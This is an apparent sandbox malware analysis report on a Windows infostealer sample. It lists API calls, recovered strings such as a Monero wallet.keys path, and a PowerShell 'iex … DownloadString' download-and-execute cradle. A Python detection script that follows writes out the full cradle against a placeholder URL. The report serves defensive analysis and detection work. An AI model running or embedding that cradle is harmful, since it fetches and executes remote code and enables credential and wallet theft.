                        • Opcode ID: b8304ddb68edf9076df57f3239b07fa6396b3ab3bd1f03de0e629aeb720040e1
                        • Instruction ID: 18fa3ec30a8d1b8c2ee392b6ef63edac443298d98ffb5a6fb24f6cf4961c806f
                        • Opcode Fuzzy Hash: b8304ddb68edf9076df57f3239b07fa6396b3ab3bd1f03de0e629aeb720040e1
                        • Instruction Fuzzy Hash: 2B212A7191021CABDB68DB54DC85FE9B7B8FB48700F00C5DAE609A6280DF71AA85CFD4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0149B878,00000000,00020119,00000000), ref: 005D76DD
                        • RegQueryValueExA.ADVAPI32(00000000,014B0300,00000000,00000000,?,000000FF), ref: 005D76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D7708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 024540c8c133855cdb3b711c3a424b0043a79a585969587b0dc45222e9aac406
                        • Instruction ID: 3d72ddb831efd2766b80325a596b9a644a284dabb87c12059c024bd1e00cb907
                        • Opcode Fuzzy Hash: 024540c8c133855cdb3b711c3a424b0043a79a585969587b0dc45222e9aac406
                        • Instruction Fuzzy Hash: 960162B5A04308BBD714DBE4DC49F6EBBB8FB48701F108456FA05E7291E6709940CB51
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0149B878,00000000,00020119,005D76B9), ref: 005D775B
                        • RegQueryValueExA.ADVAPI32(005D76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 005D777A
                        • RegCloseKey.ADVAPI32(005D76B9), ref: 005D7784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 2fb00b84359578c3d45b7c1adc28332d7100f8a6e90e285ad60b4391c9ecd085
                        • Instruction ID: 02c0554660b7cbcce819c0366d84435d546b3bc849e13e83b0dd84802d6a929d
                        • Opcode Fuzzy Hash: 2fb00b84359578c3d45b7c1adc28332d7100f8a6e90e285ad60b4391c9ecd085
                        • Instruction Fuzzy Hash: 860167B5A40308BBD754DBE4DC49FBEB7B8FB48701F008555FA05A7281D67055008B52
                        APIs
                        • CreateFileA.KERNEL32(:],80000000,00000003,00000000,00000003,00000080,00000000,?,005D3AEE,?), ref: 005D92FC
                        • GetFileSizeEx.KERNEL32(000000FF,:]), ref: 005D9319
                        • CloseHandle.KERNEL32(000000FF), ref: 005D9327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :]$:]
                        • API String ID: 1378416451-3251503520
                        • Opcode ID: b1887c20f6fdedd98eacee2a02e7dc39e938642f21176b82def8e85c113575d1
                        • Instruction ID: 61b089fd30c2be521c581ad534ac97a58019ef616f1951cbf1ded15b28e5d2c2
                        • Opcode Fuzzy Hash: b1887c20f6fdedd98eacee2a02e7dc39e938642f21176b82def8e85c113575d1
                        • Instruction Fuzzy Hash: 83F04F75E40308BBDB28DFB4DC49F9E7BF9BB48710F10CA55B651A72C0D67096018B41
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                        • LocalFree.KERNEL32(005C148F), ref: 005C9A90
                        • CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 14c8a19ed4938bd2712cb85e0ce1aef1975e4969a1543ea04b0eac88057a1490
                        • Instruction ID: 65a6980b1f881443123bf7b31724d091893cf3868f79eeecbdee9c61b5bc7339
                        • Opcode Fuzzy Hash: 14c8a19ed4938bd2712cb85e0ce1aef1975e4969a1543ea04b0eac88057a1490
                        • Instruction Fuzzy Hash: C23108B4A00209EFDB14CF94C989FAE7BB5FF48340F108158E911A7290D774AA41CFA1
                        APIs
                        • lstrcat.KERNEL32(?,014B0468), ref: 005D47DB
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4801
                        • lstrcat.KERNEL32(?,?), ref: 005D4820
                        • lstrcat.KERNEL32(?,?), ref: 005D4834
                        • lstrcat.KERNEL32(?,0149A450), ref: 005D4847
                        • lstrcat.KERNEL32(?,?), ref: 005D485B
                        • lstrcat.KERNEL32(?,014AF648), ref: 005D486F
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005D8D90: GetFileAttributesA.KERNEL32(00000000,?,005C1B54,?,?,005E564C,?,?,005E0E1F), ref: 005D8D9F
                          • Part of subcall function 005D4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005D4580
                          • Part of subcall function 005D4570: RtlAllocateHeap.NTDLL(00000000), ref: 005D4587
                          • Part of subcall function 005D4570: wsprintfA.USER32 ref: 005D45A6
                          • Part of subcall function 005D4570: FindFirstFileA.KERNEL32(?,?), ref: 005D45BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 6078114a35de81c8ba94e5bbd9ee71356e3ce9143fd5d2398968af0d813f18e6
                        • Instruction ID: fc560475d397fe028c6ca20650fb4147cf105d31121289bad936fb7d7809d3de
                        • Opcode Fuzzy Hash: 6078114a35de81c8ba94e5bbd9ee71356e3ce9143fd5d2398968af0d813f18e6
                        • Instruction Fuzzy Hash: 483191B6900309A7CB24FBB4DC89EED777CBB88300F40459AB35996181EE70D7898F95
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D2D85
                        Strings
                        • <, xrefs: 005D2D39
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 005D2CC4
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 005D2D04
                        • ')", xrefs: 005D2CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 112db245b9167f0633ac3f43828999e1e5facd6adb10e58550445c8305c0f600
                        • Instruction ID: 9fe7cf71c9feac1f493188b680043343cfc24a4883f66e9c14fc89ee71db58ea
                        • Opcode Fuzzy Hash: 112db245b9167f0633ac3f43828999e1e5facd6adb10e58550445c8305c0f600
                        • Instruction Fuzzy Hash: CE41D271C102499ADB28FBA4C895BEEBF78BF50300F40411BE446A6291DF746A8ADF95
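                        The strings recovered from this function ("C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "-nop -c \"iex(New-Object Net.WebClient).DownloadString('" and "')\"") are concatenated into one command line and handed to ShellExecuteEx, which is the behaviour behind the "Yara detected Powershell download and execute" signature; note that the 32-bit sample launches the WOW64 PowerShell host explicitly. The following is an added example written for this page, not code from Joe Sandbox or from the analysed file: it scores a process-creation command line against the components of that cradle and extracts the URL passed to DownloadString. The 'Image' and 'CommandLine' field names are an assumption modelled on Sysmon Event ID 1, and the sample events, including the URL in them, are constructed for the example.

```python
r"""Flag the PowerShell download-and-execute cradle assembled by the sample.

Added example for this report, not code from Joe Sandbox or from the analysed
file.  The strings recovered above are concatenated into one command line,

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"

and passed to ShellExecuteEx.  The functions below score a process-creation
command line against the pieces of that cradle and pull out the URL.  The
'Image'/'CommandLine' field names mirror Sysmon Event ID 1 (an assumption about
the log source); the sample events and the URL in them are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Tuple

# One regex per component of the cradle.  Switch names are real powershell.exe
# parameters (with their short forms); the cradle text matches the sample's.
INDICATORS: Dict[str, re.Pattern] = {
    "powershell_image":  re.compile(r"(?:^|[\\/\s\"'])powershell(?:_ise)?\.exe\b", re.I),
    # The sample is 32-bit and launches the WOW64 host by its full path.
    "wow64_powershell":  re.compile(r"\\SysWOW64\\WindowsPowerShell\\", re.I),
    "noprofile":         re.compile(r"(?<![\w-])-no(?:p|profile)\b", re.I),
    "inline_command":    re.compile(r"(?<![\w-])-c(?:ommand)?\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "webclient":         re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.I),
    "downloadstring":    re.compile(r"\.downloadstring\s*\(", re.I),
}
# The download-and-execute core: a string is fetched and fed straight to iex.
CORE = {"invoke_expression", "webclient", "downloadstring"}

URL_IN_DOWNLOADSTRING = re.compile(
    r"""\.downloadstring\s*\(\s*(['"])(?P<url>.*?)\1\s*\)""", re.I | re.S)


@dataclass
class CradleMatch:
    command_line: str
    indicators: List[str] = field(default_factory=list)
    url: Optional[str] = None

    @property
    def is_cradle(self) -> bool:
        return CORE.issubset(self.indicators)


def inspect_command_line(cmdline: str) -> CradleMatch:
    """Collect every cradle component present in one command line."""
    match = CradleMatch(command_line=cmdline)
    for name, pattern in INDICATORS.items():
        if pattern.search(cmdline):
            match.indicators.append(name)
    found = URL_IN_DOWNLOADSTRING.search(cmdline)
    if found:
        match.url = found.group("url")
    return match


def scan_process_events(events: Iterable[Dict[str, str]]) -> List[Tuple[str, CradleMatch]]:
    """Return (image, match) for every event whose command line is a cradle."""
    hits = []
    for event in events:
        match = inspect_command_line(event.get("CommandLine", ""))
        if match.is_cradle:
            hits.append((event.get("Image", ""), match))
    return hits


# Constructed sample events.  The URL is a placeholder, not one from the report.
_CRADLE = (r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c '
           r'"iex(New-Object Net.WebClient).DownloadString('
           "'http://example.invalid/stage2.ps1')\"")
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": _CRADLE},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users"},
]

if __name__ == "__main__":
    for image, hit in scan_process_events(SAMPLE_EVENTS):
        print(image)
        print("  indicators:", ", ".join(hit.indicators))
        print("  url:", hit.url)
```

                        Only the three core indicators (iex, Net.WebClient, DownloadString) decide the verdict; the switches and the SysWOW64 path are reported alongside so an analyst can see how closely a hit matches this sample's exact command line, while a benign -NoProfile -Command invocation is left alone.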
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005C9F41
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: e9576280ecb9f1dc7a4817be847349d1b54d91146b503a96770557a73b215531
                        • Instruction ID: 5cd5461e4e8fcf16c6e1883abd78ac8673a15fa9e5df56d3151867e6f41ad95a
                        • Opcode Fuzzy Hash: e9576280ecb9f1dc7a4817be847349d1b54d91146b503a96770557a73b215531
                        • Instruction Fuzzy Hash: B1614270A1024D9FDB24EFA4CC9AFEE7B75BF84344F008419F90A5B291DB746A45CB91
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,014AF7A8,00000000,00020119,?), ref: 005D40F4
                        • RegQueryValueExA.ADVAPI32(?,014B0480,00000000,00000000,00000000,000000FF), ref: 005D4118
                        • RegCloseKey.ADVAPI32(?), ref: 005D4122
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4147
                        • lstrcat.KERNEL32(?,014B04B0), ref: 005D415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 2afb2dc3392f16256672f59ee0175848aeb1b4a9a5cf21611ff8bee4c4af4e72
                        • Instruction ID: b13dfa1abf7d2cedb2dfab806ed5f39ddde3dc7a9b1cd9199f70490b8c092239
                        • Opcode Fuzzy Hash: 2afb2dc3392f16256672f59ee0175848aeb1b4a9a5cf21611ff8bee4c4af4e72
                        • Instruction Fuzzy Hash: DC415BB6D002086BDB28EBE0DC5AFFE777DB788300F40455DB61656181EA759B888FD2
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0149B9C8,00000000,00020119,?), ref: 005D7E5E
                        • RegQueryValueExA.ADVAPI32(?,014AF728,00000000,00000000,000000FF,000000FF), ref: 005D7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 005D7E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: b30cf69a5a630b46df9e2a3276af5a0a4da7ee00054be5f6b5634edb2900102c
                        • Instruction ID: 436a090c028b8b19b937b6d418e1e72434ef73d788d0c5c074d41d88376ac0aa
                        • Opcode Fuzzy Hash: b30cf69a5a630b46df9e2a3276af5a0a4da7ee00054be5f6b5634edb2900102c
                        • Instruction Fuzzy Hash: 031151B1A44309EBD718CF98DD49F7BBBBCFB48711F10815AF605A7280D77458008BA2
                        APIs
                        • StrStrA.SHLWAPI(014B01B0,?,?,?,005D140C,?,014B01B0,00000000), ref: 005D926C
                        • lstrcpyn.KERNEL32(0080AB88,014B01B0,014B01B0,?,005D140C,?,014B01B0), ref: 005D9290
                        • lstrlen.KERNEL32(?,?,005D140C,?,014B01B0), ref: 005D92A7
                        • wsprintfA.USER32 ref: 005D92C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
